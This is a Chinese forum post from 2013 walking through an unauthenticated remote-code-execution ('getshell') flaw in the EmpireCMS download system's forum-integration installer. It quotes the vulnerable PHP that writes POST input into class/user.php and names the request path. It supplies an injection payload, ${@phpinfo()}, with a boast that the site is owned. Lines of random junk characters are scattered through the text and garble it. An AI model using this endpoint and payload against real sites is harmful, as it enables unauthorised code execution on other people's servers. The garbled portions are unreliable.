这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
: X9 k6 l- S7 _
4 S9 O$ Y8 g$ I0 t O: @; G! ^
9 Y0 M4 I* ^# J9 L- ]这是帝国的一套下载系统 如图
5 c1 @" {7 y& U k! a6 b/ Pps(不需要任何账户和密码,直接写shell)
. \% E8 }, b' V7 @由于很多站是由于下载要整合discuz 等等一些论坛....
: T1 B4 r" c: L* T, v 2 |) S% f) a$ W% G" C
而帝国他又有一个万能接口,如图 1 W0 I8 ~2 H, W& L8 W
% t7 a* U5 @# w" U. v
4 r( K. X% T3 T3 |而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码2 ^+ \+ ?4 ]# q% @+ Q
9 K8 {; X$ T+ S/ y9 I当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
! J& B' M ~( f* s1 a ^7 U6 z I; {
在data/fun.php中的15行
4 r& Y* Y/ R& I& |3 s/ I1 V, g( T; k7 {% D
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
, ]! u4 [, |: N: u- v {17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
/ J" k; Y5 O: N( y$ X3 o$ q3 H" x1 b k/ W1 |* |1 |& Z
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);( D1 A( `( M" Z4 R6 a
! @6 o+ C9 q; m& E K
他将传进来的变量进行了切割,然后赋给了$filetext* j* E' |, J9 _* {8 c
/ O; X" n9 x! S" ]2 @- \
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
_. a$ o* K' l; R3 U+ i3 W3 [- i' F( d. c
我们看看写入的结果,随便填一个 2 |# {1 }- V% H0 Q Z! q
8 D1 v9 i! J4 |8 D @8 K! t
5 S. E0 U/ o% `. k7 E
# I8 r2 m9 C' }5 V$ Q1 M5 c1 M; i V
' i) v* g7 t! h% L: x' ?7 r7 }; E$ E4 @6 t
* a6 o/ {: i9 P7 N- t0 W. y
/ i2 M# s5 y/ ^/ n5 [3 J" ~2 T, \: d9 a/ C( P5 w9 G8 i
9 e! T6 Y9 i9 [
6 e( H1 |$ v3 h% V0 R6 ~$ Y# _- c6 P+ I5 @
7 P. R2 L. e3 T
4 B% @; U4 O0 S. S* h8 @9 x2 F! L3 t' B% J5 V$ E2 i
- y/ J4 c6 W; e1 v: q8 H# X4 l
3 V8 J. A9 d! g% h) p
: Y d4 p; f( t' U( |) D( z5 `
/ C2 f3 O* ^* F+ T) x% s* M9 C6 |2 d7 N/ {! e& ~$ ]6 A. {: g
! R5 V6 m6 W0 _/ @+ e) w
所以我们淫荡点,写个${@phpinfo()}试试 / q1 ]. q3 E6 }; d$ u$ e1 N2 T
然后访问以下class/user.php这个文件, f5 _6 x5 ]8 s: Z
日了吧
O+ t; \* F& T& B* p& T. w4 e. w: v2 v6 n7 t& }( e, y1 u0 `
" L8 e" Q1 [5 M" _' h9 ]" J
2 |. _& W+ G0 B1 n; t4 \/ F2 N
4 \5 o- p( l$ r) l- }
7 @' @7 `: m& Y. l6 j1 f' A
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对